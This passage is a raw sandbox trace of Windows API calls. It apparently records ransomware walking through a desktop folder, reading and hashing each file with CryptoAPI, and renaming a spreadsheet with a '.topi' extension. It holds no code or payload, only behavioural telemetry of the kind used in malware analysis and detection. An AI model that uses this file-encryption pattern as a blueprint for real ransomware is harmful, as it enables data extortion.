pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.919] GetLastError () returned 0x0 [0095.920] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.920] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.920] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.920] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.920] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x17700) returned 0x9a06a00 [0095.920] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.920] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.920] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f22f8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96c0 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2340 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.921] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9720 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9708 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.921] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9708 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.921] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.922] GetCurrentThreadId () returned 0x8c4 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7030 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.922] GetCurrentThreadId () returned 0x8c4 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.922] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.922] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.923] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.923] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.924] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\Ou N_tIXZ_9N6u85h.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\ou n_tixz_9n6u85h.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\Ou N_tIXZ_9N6u85h.ods.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\ou n_tixz_9n6u85h.ods.topi")) returned 1 [0095.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.924] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.924] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.925] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0095.925] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa95ead0, ftCreationTime.dwHighDateTime=0x1d5b86f, ftLastAccessTime.dwLowDateTime=0x74206860, ftLastAccessTime.dwHighDateTime=0x1d5c254, ftLastWriteTime.dwLowDateTime=0x74206860, ftLastWriteTime.dwHighDateTime=0x1d5c254, nFileSizeHigh=0x0, nFileSizeLow=0x7cde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-kMkP.doc", cAlternateFileName="")) returned 1 [0095.925] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\u-kMkP.doc") returned=".doc" [0095.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\u-kMkP.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hurldatxcvujdx\\u-kmkp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.926] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=31966) returned 1 [0095.926] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.928] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7cb8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.928] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.930] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0095.931] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.931] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.931] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.931] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.931] GetLastError () returned 0x0 [0095.931] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.931] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0095.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.931] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.931] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.931] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.931] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.931] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7ce0) returned 0x99f72d8 [0095.932] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2340 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96d8 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2388 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d96f0 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.932] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.932] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9738 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.932] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9720 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9738 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9720 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.933] GetCurrentThreadId () returned 0x8c4 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f70c0 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.933] GetCurrentThreadId () returned 0x8c4 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.933] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.933] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9720 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9738 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.934] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9708 [0095.934] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9750 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.935] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.935] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 